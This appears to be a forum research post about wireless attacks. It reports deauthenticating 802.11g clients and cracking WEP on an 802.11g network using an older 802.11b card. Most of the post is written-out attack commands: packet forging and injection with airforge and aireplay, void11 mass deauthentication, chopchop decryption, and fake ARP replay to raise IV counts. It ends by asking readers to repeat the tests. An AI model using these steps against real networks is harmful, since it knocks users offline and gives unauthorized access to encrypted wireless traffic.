Well I've been doing some testing with the new aireplay and I managed to inject with all drivers. A couple of things came up that were interesting I managed to deauthenticate a 802.11g client with a 802.11b card and crack WEP on an all 802.11g network with a 802.11b card (Captured the traffic with a 802.11g card first).
For the deauthentication I used a Cisco Aironet CB21AG-A-K9 (Atheros card) to connect to a Netgear WGR614 access point and set both to 802.11 g mode only. I used a SMC2532W-B 802.11b card (Prism 2.5 card) to deauthenticate the 802.11g stations. To ensure I was actually deauthenticating stations I used wavemon to monitor my Cisco card which was associated to the AP.
Following settings were used:
Cisco Card
- iwpriv ath0 mode 3 (G mode only)
SMC Card
- Used wlanng drivers for aireplay
- hostap drivers for void11 with commands:
1) iwpriv wlan0 hostapd 1
2) iwconfig wlan0 mode master channel <channel>
Commands issued:
Created deauthentication packet using airforge:
airforge <BSSID> <SRC MAC> deauth
Then injected using the 802.11b card:
aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth wlan0
Used void11 mass deauthentication with hostap drivers:
void11_penetration wlan0
Ignore the 'ioctl[PRISM2_IOCTL_HOSTAPD]: Invalid argument' error void11 will still work.
My 802.11g station dropped like a brick.
I managed also to crack WEP on an all 802.11g network with my SMC2532W-B 802.11b card. I noticed something strange I sniff traffic with aireplay with my 802.11b card and sometimes manage to capture traffic from the 802.11g network. I am not sure if this is due to the encoding or what, but I have captured and replayed 802.11g traffic with my 802.11b card alone. I usually capture with my Netgear WG511 (PrismGT card) and then crack the packet with chopchop with my 802.11b SMC card.
Cracking 802.11g network with 802.11b card
Used same equipment as mentioned in the beginning plus Netgear WG511 802.11g card
Captured packet using aireplay:
aireplay -i eth1 (Also sometimes I could use the 802.11b SMC card to capture traffic. Why? Not sure yet.
Used chopchop to crack using 802.11b card:
chopchop only works with prism based card
chopchop -i wlan0 <BSSID> <SRC MAC> -p <aireplay packet>
Utilized arpforge to create new packet:
arpforge <iv. file> 1 <bssid> <mac src> <ip src> <ip dst> fakearp
Inject new packet using 802.11b card:
aireplay -r fakearp wlan0
The IV count would rise.
Please test my results to verify that they are consistent with your equipment. As for 802.11b capturing 802.11g traffic it is strange. I set my Cisco Atheros card to G-mode only with iwpriv ath0 mode 3 and my netgear AP is set to G-mode only also please test this too. Post your results on the forum and use the date of this post as the title.
Source: http://new.remote-exploit.org/index.php/Research_main
aireplay, injection
Last updated 29 October 2009 by darklevel
